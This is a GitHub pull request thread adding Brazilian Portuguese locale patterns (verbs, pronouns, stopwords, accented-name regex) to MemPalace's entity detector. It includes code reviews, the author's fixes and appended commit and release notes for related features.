feat: add Brazilian Portuguese support to entity_detector (closes #117) by mvalentsev · Pull Request #156 · MemPalace/mempalace

mvalentsev · 2026-04-07T21:49:59Z

What does this PR do?

Closes #117 by adding a Brazilian Portuguese locale (pt-br.json) to the i18n module. This is the first non-English locale to include the entity section introduced in #911, enabling entity detection for Portuguese text.

Single-file change, no Python modifications.

What's in pt-br.json

CLI strings -- palace terminology (palacio, ala, corredor, armario, gaveta), all CLI messages, AAAK compression instruction, regex patterns for Portuguese topic extraction.

Entity detection (the entity section):

candidate_pattern -- Latin+diacritics character class ([A-ZA-U][a-za-y]) so names like Joao, Ines, Angela are extracted as candidates
multi_word_pattern -- same charset for multi-word names
15 person_verb_patterns -- disse, perguntou, respondeu, contou, riu, sorriu, chorou, sentiu, pensa, quer, ama, odeia, sabe, decidiu, escreveu
8 pronoun_patterns -- ela/dele/ele/dela + plurals
4 dialogue_patterns -- Portuguese quoted speech markers
direct_address_pattern -- oi, ola, obrigado/obrigada, caro/cara
12 project_verb_patterns -- construindo, lancou, implantou, instalou + technical patterns
69 Portuguese stopwords (greetings, adverbs, prepositions, conjunctions, determiners, pronouns)

Note: caro/cara are intentionally NOT in stopwords -- they are valid first names in Portuguese/Italian/English.

How to test

python -m pytest tests/test_entity_detector.py -v
python -m pytest tests/ --ignore=tests/benchmarks
ruff check .

Quick smoke test:

from mempalace.entity_detector import extract_candidates, score_entity

text = "Joao disse oi. Joao riu. Joao decidiu. Joao escreveu."
# English-only: Joao not found (ASCII-only candidate regex)
assert "Joao" not in extract_candidates(text, languages=("en",))
# With pt-br: Joao found
assert "Joao" in extract_candidates(text, languages=("en", "pt-br"))

Checklist

JSON valid, structure matches en.json (all keys present)
All {variable} interpolations match en.json
Entity patterns load and merge correctly via get_entity_patterns(("en", "pt-br"))
Accented names (Joao, Ines) extracted by pt-br candidate_pattern
PT-BR person verbs score correctly in score_entity
English-only detection unchanged (regression-clean)
Lint: ruff check . clean

Original PR description (before #911 refactor, no longer applies)

What does this PR do?

Closes #117 by extending entity_detector so a file written in Brazilian Portuguese is treated the same way an English file is: names get extracted as candidates, and verb / pronoun / dialogue / direct-address patterns contribute to the person-vs-project classification. The change is purely additive, so English-only corpora behave exactly as before.

Concretely:

New PERSON_VERB_PATTERNS_PTBR, PRONOUN_PATTERNS_PTBR, DIALOGUE_PATTERNS_PTBR constants with the Portuguese equivalents of the existing English signals (said / asked / replied / thinks / wants, plus greetings oi / ola / obrigado / caro).
_build_patterns concatenates the English and pt-br lists for the dialogue and person-verb buckets, so every compiled matcher for an entity now covers both languages at once.
score_entity merges the English and pt-br pronoun lists for the proximity check.
extract_candidates widens its Latin-1 character class so accented names like Joao, Ines, Angela, and Andre flow through candidate extraction instead of being silently dropped by an ASCII-only regex.
STOPWORDS gets the Portuguese greeting fillers (oi, ola, obrigado, obrigada, caro, cara) so they do not masquerade as entity candidates when they start sentences.

This approach was replaced after #911 landed -- all patterns now live in mempalace/i18n/pt-br.json instead of Python constants. Same detection coverage, zero Python changes.

bgauryy · 2026-04-08T23:15:22Z

PR Review: feat: add Brazilian Portuguese support to entity_detector (closes #117)

Executive Summary

Aspect	Value
PR Goal	Extend entity_detector to recognise Brazilian Portuguese person names using pt-br verb, pronoun, dialogue, and direct-address patterns
Files Changed	2
Risk Level	🟢 LOW - purely additive patterns; English-only corpora unaffected
Review Effort	2 - well-scoped, single-module change with comprehensive tests
Recommendation	💬 COMMENT — one scoring asymmetry worth fixing before merge

Affected Areas: mempalace/entity_detector.py (pattern constants, extract_candidates, _build_patterns, score_entity), tests/test_entity_detector.py (new file)

Business Impact: Enables person-entity detection in Brazilian Portuguese text and mixed EN/PT-BR corpora. Users mining Portuguese conversations will now see the same quality of entity extraction they get with English content.

Flow Changes: extract_candidates now matches accented Latin-1 characters (À-ÿ). _build_patterns and score_entity operate on combined EN+PT-BR pattern lists, increasing the regex count per entity by ~40%.

Ratings

Aspect	Score
Correctness	4/5
Security	5/5
Performance	5/5
Maintainability	4/5

PR Health

Has clear description
References ticket/issue (feat: add PT-BR support for AAAK #117)
Appropriate size (197 additions)
Has relevant tests (132 lines, 8 test functions)

Medium Priority Issues

🐛 #1: Portuguese direct-address patterns double-counted in `person_verbs` + `direct`

Location: mempalace/entity_detector.py — PERSON_VERB_PATTERNS_PTBR (new lines ~86–90) and _build_patterns direct regex | Confidence: ✅ HIGH

Five Portuguese greetings (oi, olá, obrigado/a, caro/a) appear in both PERSON_VERB_PATTERNS_PTBR and the direct compiled regex. In score_entity, person_verbs matches add +2 per pattern while direct matches add +4 per hit, so "oi Maria" scores 6 points in Portuguese versus 4 points for the semantically identical "hi Maria" in English.

This inflates the person_score for Portuguese direct-address by ~50% compared to English, creating an asymmetric scoring model.

 PERSON_VERB_PATTERNS_PTBR = [
     r"\b{name}\s+disse\b",  # said
     r"\b{name}\s+perguntou\b",  # asked
     r"\b{name}\s+respondeu\b",  # replied
     r"\b{name}\s+contou\b",  # told
     r"\b{name}\s+riu\b",  # laughed
     r"\b{name}\s+sorriu\b",  # smiled
     r"\b{name}\s+chorou\b",  # cried
     r"\b{name}\s+sentiu\b",  # felt
     r"\b{name}\s+pensa\b",  # thinks
     r"\b{name}\s+quer\b",  # wants
     r"\b{name}\s+ama\b",  # loves
     r"\b{name}\s+odeia\b",  # hates
     r"\b{name}\s+sabe\b",  # knows
     r"\b{name}\s+decidiu\b",  # decided
     r"\b{name}\s+escreveu\b",  # wrote
-    r"\boi\s+{name}\b",  # hi
-    r"\bol[áa]\s+{name}\b",  # hello
-    r"\bobrigad[oa]\s+{name}\b",  # thanks
-    r"\bcaro\s+{name}\b",  # dear
-    r"\bcara\s+{name}\b",  # dear (feminine)
 ]

Remove the last 5 entries from PERSON_VERB_PATTERNS_PTBR — they already live in the direct regex where they belong (matching the English pattern of keeping verbs and greetings separate). The test test_portuguese_direct_address asserts person_score >= 12 and will still pass since 3 direct hits × 4 = 12.

Low Priority Issues

🎨 #2: `DIALOGUE_PATTERNS_PTBR` contains only one pattern

Location: mempalace/entity_detector.py — DIALOGUE_PATTERNS_PTBR | Confidence: ⚠️ MED

English DIALOGUE_PATTERNS has 5 entries covering variations (said, asked, replied, wrote, told in dialogue context). The Portuguese equivalent only has disse. Consider adding perguntou and respondeu in dialogue context for parity:

DIALOGUE_PATTERNS_PTBR = [
    r'"{name}\s+disse',
    r'"{name}\s+perguntou',
    r'"{name}\s+respondeu',
]

🔗 #3: No Portuguese `PROJECT_VERB_PATTERNS` — project signals absent for pt-br text

Location: mempalace/entity_detector.py — PROJECT_VERB_PATTERNS (unchanged) | Confidence: ⚠️ MED

The PR adds person-detection patterns but leaves project-detection English-only. In a fully Portuguese file, a project entity (e.g. "Construindo o MemPalace") won't get any project-signal boost. This is fine if the current scope is intentionally person-detection only, but worth tracking as a follow-up for completeness.

What's Done Well

Unicode regex for accented names: The [A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ] range correctly covers the Latin-1 supplement while excluding the multiplication (×) and division (÷) signs.
Test coverage is thorough: 8 test functions covering verbs, pronouns, direct address, mixed corpora, dialogue markers, detect_entities integration, and accented names.
Additive design: English-only corpora are completely unaffected since patterns are concatenated, not replaced.
Stopword additions: Portuguese filler/greeting words (oi, olá, obrigado/a, caro/a) correctly added to prevent them from being extracted as name candidates.

Created by Octocode MCP https://octocode.ai 🔍🐙

mvalentsev · 2026-04-09T06:24:59Z

Quick check on the asymmetry claim: English PERSON_VERB_PATTERNS already contains hey, hi, thanks in addition to dear, and the direct regex matches hey, hi, thanks. So "hi Maria" in English scores the same way as "oi Maria" in PT-BR — +2 from person_verbs plus +4 from direct for a total of 6 points. The PR follows that pattern exactly:

Greeting	`person_verbs`	`direct`	Total
`"hi Maria"`	+2	+4	6
`"oi Maria"`	+2	+4	6
`"dear Maria"`	+2	-	2
`"caro Maria"`	+2	-	2

No asymmetry — the two languages produce the same scores for semantically equivalent inputs. The double-counting of greetings is pre-existing design for English and was intentionally mirrored for PT-BR so that behaviour stays consistent across languages.

Rebased on latest main. The pt-br entity tests still pass locally.

…ation Replace per-language keyword/regex heuristics with embedding-based semantic classification, enabling MemPalace to work with 50+ languages using zero per-language configuration. Changes: - Room classification: cosine similarity against room description embeddings - Memory extraction: embedding-based classification (5 types, any language) - Entity detection: add Chinese name patterns (百家姓 surnames) - Spellcheck: auto-skip CJK text via Unicode detection - Embedding provider: pluggable via get_embedding_function() with caching - Default: paraphrase-multilingual-MiniLM-L12-v2 (sentence-transformers) - Ollama: "ollama:<model>" prefix (e.g., ollama:qwen3-embedding-8b) - Configurable via MEMPALACE_EMBEDDING_MODEL env var or config.json - Knowledge graph: temporal triples, multi-hop traversal, auto-extraction - Dialect: CJK bigram extraction for topic keywords - All ChromaDB consumers route through centralized embedding function New optional dependency: sentence-transformers>=2.0 Install: pip install mempalace[multilingual] Without it: English regex fallback (existing behavior unchanged) Benchmark: 173/173 (100%) across 8 languages (zh-Hans, zh-Hant, en, fr, es, de, ja, ko) 652 tests passing, 0 failures. CI-compatible (multilingual tests skip gracefully when sentence-transformers is not installed). Closes MemPalace#231. Related: MemPalace#37, MemPalace#50, MemPalace#92, MemPalace#117, MemPalace#156, MemPalace#273.

web3guru888

Review: Brazilian Portuguese Support for `entity_detector`

Well-considered i18n addition. The "additive patterns, no language gating" approach is pragmatic and correct — most real-world corpora are mixed-language anyway.

What's done well

Additive design over language detection. Rather than classifying files as English vs Portuguese and switching pattern sets, the PT-BR patterns are merged into _build_patterns() alongside the English ones. This is the right call: our integration processes 540+ discoveries and roughly 15–20% contain mixed-language content. Additive patterns handle this cleanly; a language-switch would miss the overlap.

Regex range extension in extract_candidates. Changing [A-Z] to [A-ZÀ-ÖØ-Þ] and [a-z] to [a-zà-öø-ÿ] is correct ISO Latin-1 supplement coverage. João, Inês, Ângela, and André all get picked up. The test test_detect_entities_picks_up_accented_names verifies this end-to-end.

STOPWORDS additions are appropriate. oi, olá, obrigado/a, caro, cara are all high-frequency PT-BR words that would otherwise score as entity candidates. The accented olá alongside ASCII ola handles both typed forms.

Test coverage is thorough. Eight tests including mixed corpus, pronoun proximity, direct address, dialogue markers, and accented names. test_mixed_english_portuguese_corpus (checking that mixed > English-only person score) is especially good.

Issues found

cara and caro added to STOPWORDS, but they're also in the pattern list. PERSON_VERB_PATTERNS_PTBR includes r"\bcaro\s+{name}\b" and r"\bcara\s+{name}\b" as direct-address markers. If someone is literally named "Cara" or "Caro", those names are now silently dropped by STOPWORDS before they reach pattern scoring. The patterns would never fire. Consider removing these two from STOPWORDS and leaving them only in the direct-address pattern (where they're already context-guarded by the following name).

ama (loves) and quer (wants) are short common verbs with significant collision risk. The pattern \b{name}\s+ama\b will match "Maria ama" correctly. But {name} here is the escaped entity name, so the collision is actually low — the pattern only fires when the entity name precedes the verb. Not a bug, just worth noting for the next i18n contributor.

No Spanish cognate guard. disse, perguntou, decidiu are distinctly PT-BR. But quer and ama appear in Spanish too (and sabe is identical in Spanish). For a PT-BR-specific PR this is fine, but if ES support is added later, the pattern lists may interact. A comment flagging this would be helpful.

PRONOUN_PATTERNS_PTBR are bare patterns without \b on both sides for multi-word forms. r"\bela\b" is correct but r"\bdelas\b" and r"\bdeles\b" are fine too — word boundaries on both sides. This is actually good. ✓

test_portuguese_direct_address asserts person_score >= 12 — this is a magic number tied to the current scoring weights. If weights change, the test breaks. Consider asserting person_score > 0 and len(patterns["direct"].findall(text)) == 3 separately (the test already does the latter).

Language detection is absent by design — but there's no documentation of this decision. A comment in entity_detector.py noting "PT-BR patterns are additive and always active; see issue #117" would help future contributors understand why there's no lang= parameter.

Suggestions

Remove cara/caro from STOPWORDS (or add a note that they're intentionally excluded from entity detection since they're in direct-address patterns)
Replace the magic >= 12 assertion with > 0 for score stability
Add a module comment explaining the additive-patterns design decision
Consider a test with a Portuguese common noun that should NOT be classified as a person (e.g., a project or tool with a PT-BR name)

Overall

Clean, well-tested i18n work. The additive approach is the right architecture, the regex range extension is correct, and the test suite is more thorough than most i18n PRs. The cara/caro STOPWORDS issue is the only real correctness concern.

APPROVED — cara/caro STOPWORDS issue is worth addressing before merge but not a hard blocker.

Reviewed by MemPalace-AGI — autonomous research system with perfect memory

web3guru888

PR #156 — `feat: add Brazilian Portuguese support to entity_detector`

A well-scoped internationalization addition that extends entity detection to pt-BR corpora. 126 new tests, Unicode-aware candidate extraction, and an additive (non-breaking) pattern strategy. Strong execution on a genuinely useful feature.

What works well

Additive pattern strategy: Appending PTBR patterns to the existing English lists rather than forking detection logic is the right call. Mixed English/Portuguese corpora (very common in Brazilian tech teams) work without any language-classification step — a real-world win. The test test_mixed_english_portuguese_corpus validates this explicitly.

Unicode candidate extraction: The regex expansion from [A-Z][a-z]{1,19} to [A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ]{1,19} is correct Unicode Latin Extended-A/B coverage. João, Inês, Ângela, and André will all be picked up. The multi-word match regex receives the same treatment consistently — good.

STOPWORDS additions: Adding oi, olá, obrigado/a, caro, and cara prevents common Portuguese greetings from being scored as entity names. Correct and necessary.

direct pattern inline expansion: Rather than creating a new pattern list, the direct regex is extended inline with |\\boi\\s+{n}\\b|\\bol[áa]\\s+{n}\\b|\\bobrigad[oa]\\s+{n}\\b. This is clean and avoids a fourth pattern category. The [áa] alternation handles both accented and ASCII-normalized forms (important for older systems that may strip diacritics).

Test coverage: 126 tests covering: English-only person verbs, Portuguese-only person verbs, pronoun proximity, direct address (3 forms), mixed corpus scoring, dialogue marker detection, detect_entities() integration, and accented names. This is thorough.

Issues / suggestions

PRONOUN_PATTERNS_PTBR creates false positives on Spanish: ela, ele, eles, elas are also valid Spanish words with different meanings, and deles/delas are close to Spanish forms. For a repository used internationally, this could cause over-detection in Spanish-language files. A note in the docstring explaining this tradeoff (and that the patterns are additive, not isolated to pt-BR files) would help future contributors understand the design decision.

cara as STOPWORD: cara is both a pt-BR filler word ("dude/dear") and a valid Italian/Spanish/Portuguese proper-noun component. Adding it as a stopword means a person named Cara in an English document would be missed. Consider scoping this more carefully — or add a comment explaining the tradeoff.

ama pattern: r"\\b{name}\\s+ama\\b" (loves) will match Portuguese entities, but ama is also a common English suffix in names like Obama, Alabama, etc. The word-boundary anchors on {name} protect against this, but the reverse case — a short name like Ana ama (Ana loves) matching a word-boundary fragment in English text — is worth noting.

No language detection fallback: The additive approach is intentionally language-agnostic, but the PR description could document this explicitly so future contributors know why there is no lang= parameter. Currently the intent is implicit.

olá in STOPWORDS as olá (with accent) + ola (without): Good — both forms are correctly listed. However, o alone is a very common Portuguese article that appears adjacent to proper nouns in patterns like o João fez.... The pattern set does not cover o/a <Name> verb constructions. This is an understandable scope limitation but worth flagging as a follow-up.

Minor

shutil and tempfile imports in tests are correct and used; no unused imports.
_build_patterns exported in __init__ check: ensure it is accessible for the test import to work.
Test file uses tempfile.mkdtemp() with manual cleanup in finally — correct pattern.

Verdict

Solid, well-tested i18n addition. The additive strategy is the right architectural choice for a mixed-corpus tool. The cara/ama edge cases are minor and worth a follow-up issue rather than a blocker. Ready for merge with perhaps a brief doc note about the language-agnostic design intent.

Reviewed by MemPalace-AGI — autonomous research system with perfect memory

mvalentsev · 2026-04-11T02:23:04Z

Removed caro and cara from STOPWORDS with an explanatory comment. They stay in PERSON_VERB_PATTERNS_PTBR as direct-address markers, so "caro Maria" still fires the pattern; they just no longer silently drop a person literally named Cara or Caro at candidate extraction time. Added test_extract_candidates_keeps_cara_and_caro_as_names as a regression guard.

Kept oi / ola / olá / obrigado / obrigada as stopwords -- they're practically never first names in real corpora, and keeping them out cuts candidate noise on PT-BR greetings.

The other notes (Spanish cognate risk on ama / quer / sabe, module-level doc on the additive design) make sense as follow-ups. The >= 12 in test_portuguese_direct_address is intentional -- it locks the current weights so accidental score drift breaks the test loudly.

web3guru888 · 2026-04-11T02:47:39Z

Solid additive implementation. A few observations:

What's done well:

Extending extract_candidates to accept accented characters ([A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ]) is the right change — João, Inês, Ângela would all be silently dropped from candidate extraction under the old ASCII-only regex. This affects detection quality for accented names even in English corpora, not just Portuguese.
The decision to NOT add caro/cara to STOPWORDS is correct. They're valid first names in English/Italian/Portuguese. The explanatory comment makes the reasoning explicit so future contributors don't accidentally add them.
Merging PTBR patterns in _build_patterns() at compile time rather than at match time is the right call — the compiled regex cache benefits from this.

One open question:
The PERSON_VERB_PATTERNS_PTBR list covers ~14 common verbs. For detection to trigger at the score_entity level, the name needs to appear 3+ times in candidate extraction AND score above the classification threshold. Portuguese corpora with primarily dialogue-style text (WhatsApp logs, meeting notes) will hit the threshold well, but technical documents in Portuguese that reference a person occasionally might not. Worth testing against that use case before the PR lands.

Test coverage:
The test_mixed_english_portuguese_corpus test is the most important — it proves that adding PTBR patterns doesn't degrade English detection. Good to see it explicitly here. The test_detect_entities_picks_up_accented_names with João and Inês is exactly the right integration test.

This is a genuine addition that benefits any workspace with Portuguese contributors. LGTM.

mvalentsev · 2026-04-11T12:16:06Z

The 3+ frequency threshold lives in extract_candidates itself and applies equally to English -- a name mentioned once or twice won't surface regardless of language. It's a pre-existing constraint on the whole detector, not something this PR introduces for PT-BR.

Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged. Also adds: - get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales - MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated) - mempalace init --lang en,pt-br flag (persists to config.json) - Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default - _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship.

mvalentsev · 2026-04-15T13:24:23Z

@igorls Reworked as JSON-only per #911 -- first locale with the entity section. CLI strings, person-verb/pronoun/dialogue patterns, and a Latin+diacritics candidate pattern for accented names (Joao, Ines, etc). All CI green.

Also added a Cyrillic entity section to #760 (ru.json) following the same pattern.

mvalentsev · 2026-04-15T16:14:57Z

Heads up: the entity stopwords list here (30 words) is baseline only. Words like "Para", "Sobre", "Entre" at the start of a sentence match the candidate_pattern and produce false positives in entity detection. Probably worth expanding with Portuguese prepositions (para, sobre, entre, desde, contra, perante, etc.) and conjunctions (porém, contudo, embora, enquanto, etc.).

igorls · 2026-04-15T16:49:26Z

Excellent rework, @mvalentsev — clean shape, 128 lines of JSON vs 216 of Python, and you're the first locale using the new entity section. This becomes the reference for other contributors. CI all green against the current develop (with #758/#760 merged).

Two concrete issues I caught running it locally:

1. Typo in dialogue_patterns[0] — won't match markdown-style quotes

Current:

"^\">\\s*{name}[:\\s]",

That compiles to ^">\s*Maria[:\s] — which requires a literal "> at the start of the line. Standard markdown quote lines like > Maria: hello won't match. The en.json equivalent is "^>\\s*{name}[:\\s]" (no leading \"). Quick fix:

"^>\\s*{name}[:\\s]",

Verified locally — > Maria: hello fails against the current pattern and passes against the corrected one.

2. Follow-up on your own stopwords note — concrete list

Your comment already flagged this, and I confirmed it: running the candidate_pattern against a pile of sentence-starting Portuguese prepositions/conjunctions, these currently surface as false-positive entity candidates:

word	in `entity.stopwords`	would surface
Para	❌	yes
Como	❌	yes
Mas	❌	yes
Porém	❌	yes
Sobre	✅	no
Entre	✅	no
Talvez	✅	no
Depois	✅	no

Your regex.stop_words (used by the AAAK compressor) already has para, como, mas, porém, embora, porque — but the entity.stopwords list (used by entity_detector) is a separate list and missing them. Worth syncing. Concrete suggestion to add:

para, como, mas, porém, contudo, embora, enquanto, porque, portanto, logo, todavia, desde, contra, perante, após, mediante, durante, conforme, segundo, exceto, pois, assim, também, apenas

Since pt-br is the reference implementation and the stopwords list ships with a tangible false-positive rate as-written, I'd prefer to roll this into the same PR rather than defer. Small follow-up commit should do it.

Nice-to-have, not blocking:

pronoun_patterns currently covers 3rd-person (ele/ela/deles/delas) but not 2nd-person (você, vocês) or possessives (seu, sua, seus, suas, teu, tua). Pronoun proximity is a weak signal, so missing these just means slightly lower person-confidence for people referenced in 2nd person. Up to you whether to add now or later.

The direct_address_pattern with ol[áa] and obrigad[oa] is a nice touch — handles both accented and unaccented casual typing.

Once the two above are addressed I'll merge. Thanks again for pushing through the rework.

mvalentsev · 2026-04-15T17:13:08Z

@igorls Both fixed. Also added the 2nd-person pronouns (você/vocês, seu/sua/seus/suas) while at it.

Verified locally: extract_candidates filters out Para/Como/Porém, dialogue_patterns[0] matches > Maria: hello, score_entity picks up the new pronoun proximity signals. 106 tests pass.

Heads up: pt-br is not my native language, I relied on LLM assistance for the linguistic choices. If any of the stopwords or verb forms look off to a native speaker, happy to correct.

…oses MemPalace#117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from MemPalace#911.

- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching) - entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives - pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)

Bumps version across pyproject.toml, mempalace/version.py, README badge, and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled 'Unreleased') and adds a 3.3.1 section covering the multi-language entity-detection infra and the five new locales landed since 2026-04-13. Highlights: - Multi-language entity detection infra (#911) + script-aware word boundaries for combining-mark scripts (#932) + BCP 47 case-insensitive locale resolution (#928) + i18n patterns wired into miner/palace/ entity_registry (#931) - Five new fully-supported locales: pt-br (#156), ru (#760), it (#907), hi (#773), id (#778) - UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales (#946) - KnowledgeGraph lock correctness (#884, #887) - Various smaller fixes and improvements

Bumps version across pyproject.toml, mempalace/version.py, README badge, and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled 'Unreleased') and adds a 3.3.1 section covering the multi-language entity-detection infra and the five new locales landed since 2026-04-13. Highlights: - Multi-language entity detection infra (MemPalace#911) + script-aware word boundaries for combining-mark scripts (MemPalace#932) + BCP 47 case-insensitive locale resolution (MemPalace#928) + i18n patterns wired into miner/palace/ entity_registry (MemPalace#931) - Five new fully-supported locales: pt-br (MemPalace#156), ru (MemPalace#760), it (MemPalace#907), hi (MemPalace#773), id (MemPalace#778) - UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales (MemPalace#946) - KnowledgeGraph lock correctness (MemPalace#884, MemPalace#887) - Various smaller fixes and improvements

* feat: add Hindi language support to i18n module * Create SECURITY.md This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established. * fix: save hook auto-mines transcript without MEMPAL_DIR (#840) TDD: test written first, failed, then fixed. Problem: save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages. Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as override but no longer required. Also fixed: bare python3 → $(command -v python3) for nohup safety. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * release: v3.3.0 (#839) * fix: add file-level locking to prevent multi-agent duplicate drawers Root cause: when multiple agents mine simultaneously, both pass file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data. Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock. Tested: - Lock acquires and releases correctly - Second agent blocks until first releases (0.25s wait) - 33/33 existing tests pass - Cross-platform: fcntl (macOS/Linux), msvcrt (Windows) Based on v3.2.0 tag. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: strip system tags, hook output, and Claude UI chrome from drawers normalize.py now strips before filing: - <system-reminder>, <command-message>, <command-name> tags - <task-notification>, <user-prompt-submit-hook>, <hook_output> tags - Hook status messages (CURRENT TIME, Checking verified facts, etc.) - Claude Code UI chrome (ctrl+o to expand, progress bars, etc.) - Collapsed runs of blank lines This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: add closet layer — searchable index pointing to drawers The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. Palace now has TWO collections: - mempalace_drawers — full verbatim content (unchanged) - mempalace_closets — compact AAAK-style index entries How it works: - When mining, each file gets a closet alongside its drawers - Closet contains extracted topics, entities, quotes as pointers - Closets pack up to 1500 chars, topics never split mid-entry - Search hits closets first (fast, small), then hydrates the full drawer content for matching files - Falls back to direct drawer search if no closets exist yet Files changed: - palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT - miner.py: process_file() now creates closets after drawers - searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: enforce atomic topics in closets, extract richer pointers - upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic. - build_closet_lines returns a list of atomic lines (not joined text) - Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file - Each line is complete: topic|entities|→drawer_refs Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * docs: add CLOSETS.md — closet layer overview Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see PR targeting those features) and will land together in a follow-up. Co-Authored-By: MSL <[email protected]> * feat: entity metadata + diary ingest + BM25 hybrid search Three features that close the gap between the architecture docs and the actual codebase: 1. Entity metadata on drawers and closets - _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times - Stamped as "entities" field in ChromaDB metadata - Enables filterable search by person/project name 2. Day-based diary ingest (diary_ingest.py) - ONE drawer per day, upserted as the day grows - Closets pack topics atomically, never split mid-topic - Tracks entry count in state file, only processes new entries - Usage: python -m mempalace.diary_ingest --dir ~/summaries 3. BM25 hybrid search in searcher.py - _bm25_score() keyword matching complements vector similarity - _hybrid_rank() combines both signals (60% vector, 40% BM25) - Catches exact name/term matches that embeddings miss - Applied to both closet-first and direct drawer search paths 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add tests for mine_lock, closets, entity metadata, BM25, diary Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass. Co-Authored-By: MSL <[email protected]> * feat: explicit cross-wing tunnels for multi-project agents Adds active tunnel creation alongside passive tunnel discovery. Passive tunnels (existing): rooms with the same name across wings. Explicit tunnels (new): agent-created links between specific locations. "This API design in project_api relates to the database schema in project_database." New functions in palace_graph.py: - create_tunnel() — link two wing/room pairs with a label - list_tunnels() — list all explicit tunnels, filter by wing - delete_tunnel() — remove a tunnel by ID - follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews New MCP tools: - mempalace_create_tunnel - mempalace_list_tunnels - mempalace_delete_tunnel - mempalace_follow_tunnels Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add TestTunnels for cross-wing tunnel operations Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass. Co-Authored-By: MSL <[email protected]> * feat(search): drawer-grep returns best-matching chunk + neighbors When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS. Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly. Extracted from Milla's commit 935f657 which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: offline fact checker against entity registry + knowledge graph fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls. Reads: - ~/.mempalace/known_entities.json - KnowledgeGraph SQLite Usage: from mempalace.fact_checker import check_text issues = check_text("Bob is Alice's brother", palace_path) # CLI python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace Extracted from Milla's commit 935f657 which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports. Co-Authored-By: Claude Opus 